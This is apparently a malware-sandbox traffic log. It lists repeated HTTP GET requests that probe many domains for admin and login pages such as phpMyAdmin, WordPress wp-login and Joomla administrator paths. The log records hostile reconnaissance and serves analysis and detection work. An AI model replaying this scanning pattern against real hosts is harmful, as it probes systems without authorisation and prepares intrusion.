Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://96l.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://nrnet.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://6ail.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://z-a.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.80.36; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.119.144.201; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.119.144.209; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
